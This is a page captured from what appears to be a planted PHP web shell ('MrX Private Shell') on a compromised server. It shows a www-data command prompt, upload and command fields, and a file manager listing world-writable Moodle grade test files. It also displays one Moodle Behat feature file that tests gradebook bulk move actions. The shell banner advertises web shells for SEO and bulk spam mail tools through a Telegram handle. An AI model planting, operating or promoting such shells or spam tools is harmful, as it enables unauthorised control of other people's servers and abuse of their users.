__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@core @core_grades @javascript
Feature: Teachers can perform bulk actions on grade items and categories in the gradebook setup
  In order to be able to easily organize my gradebook
  As a teacher
  I need to be able to select multiple grade items and categories and perform bulk actions on them

  Background:
    Given the following "courses" exist:
      | fullname | shortname | category |
      | Course   | C1        | 0        |
    And the following "users" exist:
      | username  | firstname | lastname  | email                 | idnumber  |
      | teacher1  | Teacher 1 | 1         | teacher1@example.com  | t1        |
    And the following "course enrolments" exist:
      | user      | course | role           |
      | teacher1  | C1     | editingteacher |
    And the following "grade categories" exist:
      | fullname   | course |
      | Category 1 | C1     |
    And the following "grade categories" exist:
      | fullname   | course | gradecategory |
      | Category 2 | C1     | Category 1    |
      | Category 3 | C1     | Category 2    |
    And the following "grade items" exist:
      | itemname     | course | category   |
      | Grade item 1 | C1     | ?          |
      | Grade item 2 | C1     | Category 1 |
      | Grade item 3 | C1     | Category 1 |
      | Grade item 4 | C1     | Category 2 |
    And I log in as "teacher1"
    And I am on "Course" course homepage
    And I navigate to "Setup > Gradebook setup" in the course gradebook

  Scenario: A teacher can see bulk action options in the gradebook setup
    # Bulk action options should not be displayed until at least one grade item is selected.
    Given I should not see "Move" in the "sticky-footer" "region"
    When I set the field "Grade item 1" to "1"
    Then I should see "Move" in the "sticky-footer" "region"
    And I set the field "Grade item 2" to "1"
    And I should see "Move" in the "sticky-footer" "region"
    # Unchecking all grade items should hide the bulk action area.
    And I set the following fields to these values:
      | Grade item 1 | 0 |
      | Grade item 2 | 0 |
    And I should not see "Move" in the "sticky-footer" "region"

  Scenario: A teacher can see the number of selected grade items and categories in the bulk action area
    Given I set the field "Grade item 1" to "1"
    # Selecting a grade category should also select all grade items in that category.
    When I set the field "Category 2" to "1"
    Then I should see "4 selected" in the "sticky-footer" "region"
    And I set the field "Category 2" to "0"
    And I should see "1 selected" in the "sticky-footer" "region"
    And I set the field "All" to "1"
    And I should see "8 selected" in the "sticky-footer" "region"
    And I set the field "All" to "0"
    And I should not see "selected" in the "sticky-footer" "region"

  Scenario: A teacher can unselect all grade items and categories in the bulk action area
    Given I set the following fields to these values:
      | Grade item 1 | 1 |
      | Category 2   | 1 |
    And I should see "4 selected" in the "sticky-footer" "region"
    And "Close bulk edit" "button" should exist in the "sticky-footer" "region"
    When I click on "Close bulk edit" "button" in the "sticky-footer" "region"
    Then the following fields match these values:
      | All          | 0 |
      | Grade item 1 | 0 |
      | Category 1   | 0 |
      | Grade item 2 | 0 |
      | Grade item 3 | 0 |
      | Category 2   | 0 |
      | Grade item 4 | 0 |
      | Category 3   | 0 |
    And "Close bulk edit" "button" should not exist in the "sticky-footer" "region"

  Scenario: A teacher can see bulk move modal with all available grade categories
    Given I set the field "Grade item 1" to "1"
    When I click on "Move" "button" in the "sticky-footer" "region"
    Then "Move items" "dialogue" should exist
    And "Course" "list_item" should exist in the "Move items" "dialogue"
    And "Category 1" "list_item" should exist in the "Move items" "dialogue"
    And "Category 2" "list_item" should exist in the "Move items" "dialogue"
    And "Category 3" "list_item" should exist in the "Move items" "dialogue"

  Scenario: A teacher can collapse grade categories in the bulk move modal
    Given I set the field "Grade item 1" to "1"
    And I click on "Move" "button" in the "sticky-footer" "region"
    # Collapse "Category 2" category.
    When I click on "Collapse" "link" in the "Category 2" "list_item"
    Then "Course" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 1" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 2" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 3" "list_item" in the "Move items" "dialogue" should not be visible
    And "Expand" "link" should exist in the "Category 2" "list_item"
    # Collapse "Category 1" category.
    And I click on "Collapse" "link" in the "Category 1" "list_item"
    And "Course" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 1" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 2" "list_item" in the "Move items" "dialogue" should not be visible
    And "Category 3" "list_item" in the "Move items" "dialogue" should not be visible
    And "Expand" "link" should exist in the "Category 1" "list_item"
    # Expand "Category 1" category.
    And I click on "Expand" "link" in the "Category 1" "list_item"
    And "Course" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 1" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 2" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 3" "list_item" in the "Move items" "dialogue" should not be visible
    And "Collapse" "link" should exist in the "Category 1" "list_item"
    # Expand "Category 2" category.
    And I click on "Expand" "link" in the "Category 2" "list_item"
    And "Course" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 1" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 2" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 3" "list_item" in the "Move items" "dialogue" should be visible
    And "Collapse" "link" should exist in the "Category 2" "list_item"

  Scenario: A teacher can move multiple grade items to a category
    Given I set the field "Grade item 2" to "1"
    And I set the field "Grade item 1" to "1"
    And I click on "Move" "button" in the "sticky-footer" "region"
    And I click on "Category 3" "list_item" in the "Move items" "dialogue"
    And I click on "Move" "button" in the "Move items" "dialogue"
    And I wait to be redirected
    # Confirm that 'Grade item 1' and 'Grade item 2' have been moved to 'Category 3'
    And I click on grade item menu "Grade item 1" of type "gradeitem" on "setup" page
    When I choose "Edit grade item" in the open action menu
    And "Edit grade item" "dialogue" should exist
    Then I should see "Category 3" in the "Grade category" "form_row"
    And I click on "Cancel" "button" in the "Edit grade item" "dialogue"
    And I click on grade item menu "Grade item 2" of type "gradeitem" on "setup" page
    And I choose "Edit grade item" in the open action menu
    And "Edit grade item" "dialogue" should exist
    And I should see "Category 3" in the "Grade category" "form_row"
    And I click on "Cancel" "button" in the "Edit grade item" "dialogue"
    # Confirm that all other grade items have not been moved.
    And I click on grade item menu "Grade item 3" of type "gradeitem" on "setup" page
    When I choose "Edit grade item" in the open action menu
    And I wait until "Edit grade item" "dialogue" exists
    Then I should see "Category 1" in the "Grade category" "form_row"
    And I click on "Cancel" "button" in the "Edit grade item" "dialogue"
    And I click on grade item menu "Grade item 4" of type "gradeitem" on "setup" page
    And I choose "Edit grade item" in the open action menu
    And I wait until "Edit grade item" "dialogue" exists
    And I should see "Category 2" in the "Grade category" "form_row"

  @accessibility
  Scenario: A teacher can navigate through the grade categories in the bulk modal using the keyboard
    Given I set the field "Grade item 1" to "1"
    And I press tab key in "sticky-footer" "region"
    And the focused element is "Move" "button" in the "sticky-footer" "region"
    And I press enter
    And "Move items" "dialogue" should exist
    And I press tab
    And the focused element is "Close" "button" in the "Move items" "dialogue"
    And I press tab
    And the focused element is "Course" "list_item" in the "Move items" "dialogue"
    # Move to the next grade category.
    When I press the down key
    Then the focused element is "Category 1" "list_item" in the "Move items" "dialogue"
    And the page should meet accessibility standards with "wcag131, wcag141, wcag412" extra tests
    And I press the down key
    And the focused element is "Category 2" "list_item" in the "Move items" "dialogue"
    # Move to the previous grade category.
    And I press the up key
    And the focused element is "Category 1" "list_item" in the "Move items" "dialogue"
    And I press the up key
    And the focused element is "Course" "list_item" in the "Move items" "dialogue"
    # Move to the last grade category.
    And I press the end key
    And the focused element is "Category 3" "list_item" in the "Move items" "dialogue"
    # Move to the first grade category.
    And I press the home key
    And the focused element is "Course" "list_item" in the "Move items" "dialogue"

  @accessibility
  Scenario: A teacher can collapse and expand the grade categories in the bulk modal using the keyboard
    Given I set the field "Grade item 1" to "1"
    And I press tab key in "sticky-footer" "region"
    And the focused element is "Move" "button" in the "sticky-footer" "region"
    And I press enter
    And "Move items" "dialogue" should exist
    And I press tab
    And the focused element is "Close" "button" in the "Move items" "dialogue"
    And I press tab
    And the focused element is "Course" "list_item" in the "Move items" "dialogue"
    And I press the down key
    Then the focused element is "Category 1" "list_item" in the "Move items" "dialogue"
    And I press the down key
    And the focused element is "Category 2" "list_item" in the "Move items" "dialogue"
    And "Collapse" "link" should exist in the "Category 2" "list_item"
    # Collapse "Category 2" category.
    When I press the left key
    Then "Course" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 1" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 2" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 3" "list_item" in the "Move items" "dialogue" should not be visible
    And "Expand" "link" should exist in the "Category 2" "list_item"
    And the page should meet accessibility standards with "wcag131, wcag141, wcag412" extra tests
    And the focused element is "Category 1" "list_item" in the "Move items" "dialogue"
    And "Collapse" "link" should exist in the "Category 2" "list_item"
    # Collapse "Category 1" category.
    And I press the left key
    And "Course" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 1" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 2" "list_item" in the "Move items" "dialogue" should not be visible
    And "Category 3" "list_item" in the "Move items" "dialogue" should not be visible
    And "Expand" "link" should exist in the "Category 1" "list_item"
    And I press the down key
    # Expand "Category 1" category.
    And I press the right key
    And "Course" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 1" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 2" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 3" "list_item" in the "Move items" "dialogue" should not be visible
    And "Collapse" "link" should exist in the "Category 1" "list_item"
    And the focused element is "Category 2" "list_item" in the "Move items" "dialogue"
    # Expand "Category 2" category.
    And I press the right key
    And "Course" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 1" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 2" "list_item" in the "Move items" "dialogue" should be visible
    And "Category 3" "list_item" in the "Move items" "dialogue" should be visible
    And "Collapse" "link" should exist in the "Category 2" "list_item"

  @accessibility
  Scenario: A teacher can move multiple items to a category using the keyboard
    Given I set the following fields to these values:
      | Grade item 1 | 1 |
      | Grade item 2 | 1 |
    And I press tab key in "sticky-footer" "region"
    And the focused element is "Move" "button" in the "sticky-footer" "region"
    And I press enter
    And "Move items" "dialogue" should exist
    And I press tab
    And the focused element is "Close" "button" in the "Move items" "dialogue"
    And I press tab
    And the focused element is "Course" "list_item" in the "Move items" "dialogue"
    And I press the down key
    And the focused element is "Category 1" "list_item" in the "Move items" "dialogue"
    And I press the down key
    And the focused element is "Category 2" "list_item" in the "Move items" "dialogue"
    And I press the down key
    And the focused element is "Category 3" "list_item" in the "Move items" "dialogue"
    And the "data-selected" attribute of "Category 3" "list_item" should contain "false"
    # Select the grade category "Category 2".
    And I press enter
    And the "data-selected" attribute of "Category 3" "list_item" should contain "true"
    And the page should meet accessibility standards with "wcag131, wcag141, wcag412" extra tests
    And I press tab
    And the focused element is "Cancel" "button" in the "Move items" "dialogue"
    And I press tab
    And the focused element is "Move" "button" in the "Move items" "dialogue"
    When I press the enter key
    And I wait until the page is ready
    And I wait "2" seconds
    And I press tab key in "region-main" "region"
    # Confirm that 'Grade item 1' and 'Grade item 2' have been moved to 'Category 3'
    And I click on grade item menu "Grade item 1" of type "gradeitem" on "setup" page
    And I choose "Edit grade item" in the open action menu
    And I wait until "Edit grade item" "dialogue" exists
    Then I should see "Category 3" in the "Grade category" "form_row"
    And I click on "Cancel" "button" in the "Edit grade item" "dialogue"
    And I click on grade item menu "Grade item 2" of type "gradeitem" on "setup" page
    And I choose "Edit grade item" in the open action menu
    And I wait until "Edit grade item" "dialogue" exists
    And I should see "Category 3" in the "Grade category" "form_row"

Filemanager

Name Type Size Permission Actions
behat_grade.php File 14.18 KB 0777
behat_grade_deprecated.php File 8.29 KB 0777
behat_grades.php File 10.46 KB 0777
grade_UI_settings.feature File 1.98 KB 0777
grade_aggregation.feature File 34.84 KB 0777
grade_aggregation_changes.feature File 34.02 KB 0777
grade_average.feature File 7.5 KB 0777
grade_calculated_grade_items.feature File 10.93 KB 0777
grade_calculated_grade_items_20150627.feature File 11.37 KB 0777
grade_calculated_weights.feature File 15.96 KB 0777
grade_category_validation.feature File 7.16 KB 0777
grade_contribution_with_extra_credit.feature File 4.31 KB 0777
grade_custom_scales.feature File 2.27 KB 0777
grade_edit_tree_bulk_actions.feature File 14.8 KB 0777
grade_export_default_method.feature File 1.03 KB 0777
grade_feedback.feature File 3.43 KB 0777
grade_grade_minmax_change.feature File 3.82 KB 0777
grade_hidden_items.feature File 4.11 KB 0777
grade_hidden_items_locked_category.feature File 4.32 KB 0777
grade_import.feature File 4.54 KB 0777
grade_item_duplication.feature File 2.35 KB 0777
grade_item_form_unhide.feature File 5.49 KB 0777
grade_item_pass_data_to_advanced_page.feature File 7.34 KB 0777
grade_item_validation.feature File 6.45 KB 0777
grade_letter_boundary.feature File 1.97 KB 0777
grade_letter_boundary_20160518.feature File 2.08 KB 0777
grade_letter_logging.feature File 1.49 KB 0777
grade_mingrade.feature File 4.98 KB 0777
grade_minmax.feature File 11.57 KB 0777
grade_natural_exclude_empty.feature File 20.3 KB 0777
grade_natural_exclude_empty_20150619.feature File 21.21 KB 0777
grade_natural_normalisation.feature File 16.04 KB 0777
grade_natural_normalisation_20150619.feature File 7.66 KB 0777
grade_override_letter.feature File 12.04 KB 0777
grade_point_maximum.feature File 4.7 KB 0777
grade_recovery_settings.feature File 2.6 KB 0777
grade_regrade_do_not_override.feature File 3.4 KB 0777
grade_scales.feature File 10.65 KB 0777
grade_scales_aggregation.feature File 6.55 KB 0777
grade_scales_logging.feature File 959 B 0777
grade_single_item_scales.feature File 8.27 KB 0777
grade_to_pass.feature File 15.99 KB 0777
grade_view.feature File 5.11 KB 0777
siteadmin_grades_outcomes_breadcrumbs.feature File 1.33 KB 0777
siteadmin_grades_scale_breadcrumbs.feature File 1016 B 0777
toggle_grade_categories.feature File 12.98 KB 0777
Filemanager